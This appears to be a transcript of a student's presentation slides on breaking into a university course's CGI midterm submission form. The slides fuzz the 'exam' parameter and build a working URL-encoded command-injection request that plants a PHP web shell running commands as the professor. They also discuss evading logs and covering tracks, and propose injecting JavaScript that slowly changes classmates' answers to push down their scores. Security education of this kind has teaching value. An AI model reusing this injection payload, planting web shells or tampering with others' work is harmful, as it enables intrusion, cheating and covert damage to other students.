Hacking the Midterm
Download
Report
Transcript Hacking the Midterm
For Profit Grades and Fun
Mike Gerschefske
HACKING THE MIDTERM
(Rev 2)
About Me
UCCS – B. S. Computer Engineering ’05
UCCS – M.E.I.A ever since
Just need to finish project :(
iCTF (International Cyber War Games)
Going on 4th year with UCCS
The MITRE Corporation
Beautiful Girlfriend Kelly
Interests in RE, etc.
Intro
Actually hacked the Review
Assume actual test just like review
No source code
Locked Down
Already have read access to most things (shell access)
Other people’s midterms, etc.
Misc auth files
Do we even need to hack it? Maybe … What’s out goal?
http://cs.uccs.edu/~cs502/CS502M2008midterm.html
How does the midterm work?
Fill out form and press Submit
Username
Password
Answers
Form checks credentials
Save’s midterm to disk
Emails midterm to Dr. Chow and User
The Midterm
On Submit
Echo’s out everything submitted
and at the bottom of the screen…
name=exam, value=CS502M2008midterm
class=CS502, year=2008, semester=M2008
term=midterm
open filename=CS502M2008Grade.txt
login incorrect!
What we do know
Form is .cgi
Probably Perl
Form check’s authentication in file:
CS502S2008Grade.txt
/users/server/faculty/chow/public_html/cgibin/grade/CS502S2008Grade.txt
Said so (in lesser words) on the web page
Assumptions:
Potentially grepping username file for valid credentials
Probably using Perl’s open command
What we do know (cont.)
Exams are saved here:
.../public_html/cgi-
bin/grade/CS502/CS502M2008midterm/
Exams saved in the format:
exam_username_108_7_date
First Thought
Probably doesn’t check input values from
CS502S2008Grade.txt
Why would you, it’s trusted?
Exploit the trusted
If we could potentially change a username in there
might be able to exploit unchecked variables
If a file is echo’ed out with unchecked names, we
could execute arbitrary system commands
Finding out more
Just hitting Submit (Empty exam) posts the following:
exam=CS502M2008midterm&name=&login=&passwd=&1d=&1e
1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5b=&assum
ptions=
Why does it send: CS502M2008midterm?
Probably written to be generic
Returns:
name=exam, value=CS502M2008midterm
class=CS502, year=2008, semester=M2008 term=midterm
open filename=CS502M2008Grade.txt
login incorrect!
Modifying Requests
Empty exam omitting CS502M2008midterm :
exam=CS502M2008midterm&name=&login=&passwd=&1
d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=
&5b=&assumptions=
Sending no exam parameter
Change to exam=&name=&login=…
Returns
name=exam, value=
class=, year=, semester= term=
open filename=Grade.txt
login incorrect!
Modifying Requests (cont.)
Send the following (fuzzing)
exam=abcdefghicjklmnopqrstuvwxyz&name=&login=&passwd
=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b1=&5a=&5
b=&assumptions=
Returns
name=exam, value=abcdefghicjklmnopqrstuvwxyz
class=abcde, year=ghic, semester=fghic
term=jklmnopqrstuvwxyz
open filename=abcdefghicGrade.txt
login incorrect!
Assumptions
First 10 letters of exam is appended to Grade.txt authentication
file
10 letters is not a lot to work with
Probably does a split of exam[1..10]
*Grade.txt
First thought, try to change location of Grade.txt
If we control it, we control potentially unchecked input
Assumptions
Probably issuing the following command
open “~chow/…/” + $10char + Grade.txt
This would prevent from using /tmp because of the
leading file path
/tmp/abcGrade.txt
This may be an avenue but found other solution
so stopped pursuing this
Split Exam Input Value into
two Parameters
Exam value appears somewhere else
../ public_html/cgi-
bin/grade/CS502/CS502M2008midterm/*exams
First 10 character CS502M2008 appended to
Grade.txt
CS502M2008Grade.txt
Why do we upload the entire string
CS502M2008midterm???
CS502M2008midterm
Since CS502M2008 is used for authentication we
should leave this alone
Let’s modify midterm and see what it does…
Change exam=CS502M2008midterm to
exam=CS502M2008blah
Unauthenticated it creates a directory:
../ public_html/cgi-bin/grade/CS502/CS502M2008blah
Authenticated it creates a directory CS502M2008blah
and writes out exam and then emails
Don’t think I actually ever did this authenticated
If Authenticated
If folder for this midterm doesn’t exist, create it
Upload Exam to folder
Email Out copy to Dr. Chow and me
Assumptions
Code maybe calls a mkdir or users perl to create the
directory
Probably uses perl to write out the file
Probably not writing socket code to do a SMTP call
Email Out
How does this work?
Email Out
Probably something like this:
exec(
mail -s exam [email protected] [email protected] <
$dir_to_exam/$exam
)
Probably doesn’t check the $dir_to_exam
Why would a directory name contain malicious content?
Can’t change $exam ($exam ~= $user_name) and we
can’t change $user_name w/o modifying *Grade.txt
But we can modify $dir_to_exam!!!!
Our fuzzing even showed it could be any length
Authenticated vs.
Unauthenticated
Regardless of authentication a directory is
created
Creating directories doesn’t do very much for
us
Only if authenticated with it run the mail
program command
Execute My Command
Modify the following:
exam=CS502M2008midterm&name=&login=&passwd
=&1d=&1e1=&1e2=&1e3=&2b1=&2b2=&2b=&3a2=&3b
1=&5a=&5b=&assumptions=
To:
exam=CS502M2008COMMAND&login=_LOGIN_&pas
swd=_PASSWD_
Note: if we don’t login correctly, the mail program
won’t get executed
By keeping CS502M2008 the system will use
CS502M2008Grade.txt to authenticate us
We (I) have (had) a username in this file
New Request
Need help encoding URLs:
http://www.w3schools.com/TAGS/ref_urlencode.asp
Let’s upload the following command:
& echo "<?php exec(\$_GET['command']); ?>" > a.php
&
%26+echo+%22%3C%3Fphp+exec%28%5C%24%5FG
ET%5B%27command%27%5D%29%3B+%3F%3E%22
+%3E+a%2Ephp+%26
exam=CS502M2008%26+echo+%22%3C%3Fphp+exec%
28%5C%24%5FGET%5B%27command%27%5D%29%3B
+%3F%3E%22+%3E+a%2Ephp+%26&login=mgersch2&p
asswd=111-22-3333
Last Request
exam=CS502M2008%26+echo+%22%3C%3Fphp+ex
ec%28%5C%24%5FGET%5B%27command%27%5D
%29%3B+%3F%3E%22+%3E+a%2Ephp+%26&login
=mgersch2&passwd=111-22-3333
Creates a directory called:
CS502M2008& echo "<?php
exec(\$_GET['command']); ?>" > a.php &
Mail Program
Assumption
exec(
mail -s exam [email protected] [email protected] <
$dir_to_exam/$exam )
Is now turned into:
exec(
mail -s exam [email protected] [email protected] < &
\
echo "<?php exec( $_GET['command']); ?>" > a.php &
/$exam )
Successfully create …/grade/a.php that takes
commands and runs them as Dr. Chow
Conclusions
Consequently, this hack appears to never send out an email
– Dr. Chow is never notified that it was hacked
Or does it? It doesn’t, verified.
Logs usually only show GETs, not POSTs
Clean up directories we’ve create and we’ve covered our tracks
Using the a.php to upload commands uses GETs.
Everything is probably logged there
Can easily change this to POSTs
Probably a wise idea to secure anything that remotely looks
like a production system.
Backups
Evil Things to Do
Average test may take ~30+Minutes
Injecting JS that every 5-10 minutes, picks a
multiple choice question and changes the
answer
Slow enough which people may not notice the change
If the user prints out a copy, hard copy will be wrong
too
Goal: Lower everyone else's test scores by some
reasonable amount to put yourself at the top of
the curve
IDS
IDS probably could not have stopped this
Least not initially
This is a security test therefore answers that
would normally be acceptable, IDS might
throw away
i.e. how would you hack this site